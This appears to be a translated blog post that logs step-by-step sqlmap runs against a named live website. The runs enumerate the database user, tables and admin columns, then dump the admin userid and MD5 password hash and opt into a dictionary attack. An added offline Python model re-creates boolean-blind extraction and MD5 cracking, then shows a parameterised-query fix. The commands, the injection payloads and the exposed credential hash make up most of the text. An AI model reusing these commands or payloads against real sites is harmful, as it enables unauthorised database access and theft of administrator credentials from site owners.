sqlmap worked example: injecting a MySQL back end

Original post, published 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* Note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* list the tables in the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* list the columns of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* dump the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
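Added example, not part of the original post and not sqlmap's own code: an offline Python model of what the sqlmap runs above did. SQLite stands in for the target's MySQL, the wepost/admin schema follows the columns sqlmap enumerated (id, password, type, userid), and the row, the password, the wordlist and the suffix list are all constructed for the example (the real password behind the dumped hash is not on the page and is not attempted). The block shows why `id=276 AND 799=799` works as a true/false oracle, how a boolean-based blind technique reads a value out of that oracle one character at a time (here the admin userid and password hash), the dictionary-plus-suffix step sqlmap offered after the --dump, and what the parameterised query does with the same payload.

```python
# Added example (not from the original post, not sqlmap code): an offline model of
# the article.php?id= injection above. The 'wepost' schema mirrors the sqlmap
# output (admin: id, password, type, userid); the rows, the wordlist and the
# suffix list are constructed for the example, and SQLite stands in for MySQL.
import hashlib
import re
import sqlite3
from typing import Iterable, Optional

ADMIN_PLAINTEXT = "wepost2010!"  # constructed; the real password is not on the page
ADMIN_HASH = hashlib.md5(ADMIN_PLAINTEXT.encode()).hexdigest()
WORDLIST = ["admin", "password", "wepost", "wepost2010"]  # constructed mini wordlist
SUFFIXES = ("", "1", "123", "2010", "!")  # stands in for sqlmap's 'common password suffixes'


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(
        "CREATE TABLE article (id INTEGER PRIMARY KEY, title TEXT, body TEXT);"
        "CREATE TABLE admin (id INTEGER PRIMARY KEY, password TEXT, type TEXT, userid TEXT);"
        "INSERT INTO article VALUES (276, 'Issue 276', 'constructed article body');"
    )
    db.execute("INSERT INTO admin VALUES (1, ?, 'super', 'wepost2010')", (ADMIN_HASH,))
    return db


def vulnerable_article(db: sqlite3.Connection, id_param: str):
    """Models article.php: the GET parameter is spliced into the SQL text."""
    return db.execute("SELECT title, body FROM article WHERE id=" + id_param).fetchone()


def safe_article(db: sqlite3.Connection, id_param: str):
    """Hardened form: the value is bound as data, never parsed as SQL."""
    return db.execute("SELECT title, body FROM article WHERE id=?", (id_param,)).fetchone()


def oracle(db: sqlite3.Connection, condition: str) -> bool:
    """Boolean-based blind oracle, the same shape as sqlmap's `id=276 AND 799=799`:
    True iff the article still comes back with the extra condition appended."""
    try:
        return vulnerable_article(db, f"276 AND ({condition})") is not None
    except sqlite3.Error:
        return False


def blind_extract(db: sqlite3.Connection, subquery: str, max_len: int = 64) -> str:
    """Recover the string `subquery` returns, one character at a time, by binary
    search over its code point (7 true/false probes per character). On MySQL the
    probe would be ASCII(SUBSTRING(...)); SQLite spells it unicode(substr(...))."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127  # invariant: the true code point lies in [lo, hi]
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(db, f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end: substr() gives '' and unicode('') is NULL, so every probe is False
            break
        out += chr(lo)
    return out


MD5_RE = re.compile(r"^[0-9a-f]{32}$")


def crack_md5(hexdigest: str, wordlist: Iterable[str], suffixes=SUFFIXES) -> Optional[str]:
    """The follow-up step sqlmap offered after --dump ('recognized possible password
    hash values ... use common password suffixes?'): each word, each suffix, one MD5."""
    if not MD5_RE.match(hexdigest):
        return None
    for word in wordlist:
        for suffix in suffixes:
            candidate = word + suffix
            if hashlib.md5(candidate.encode()).hexdigest() == hexdigest:
                return candidate
    return None


def demo() -> dict:
    db = make_db()
    return {
        "oracle_true": oracle(db, "799=799"),
        "oracle_false": oracle(db, "799=798"),
        "userid": blind_extract(db, "SELECT userid FROM admin LIMIT 1"),
        "password_hash": blind_extract(db, "SELECT password FROM admin LIMIT 1"),
        "cracked": crack_md5(ADMIN_HASH, WORDLIST),
        "safe_query_with_payload": safe_article(db, "276 AND 799=799"),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run it with python3; demo() returns every result. Two points worth knowing when reading the log above: "a total of 0 HTTP(s) requests" appears because sqlmap resumed the injection points from its session file, not because the target went untouched; and the blind technique modelled here costs seven requests per character, which is why sqlmap prefers the UNION and error-based techniques it also found (they return data directly in the response body) and keeps the time-based one (`AND SLEEP(5)`) as a last resort.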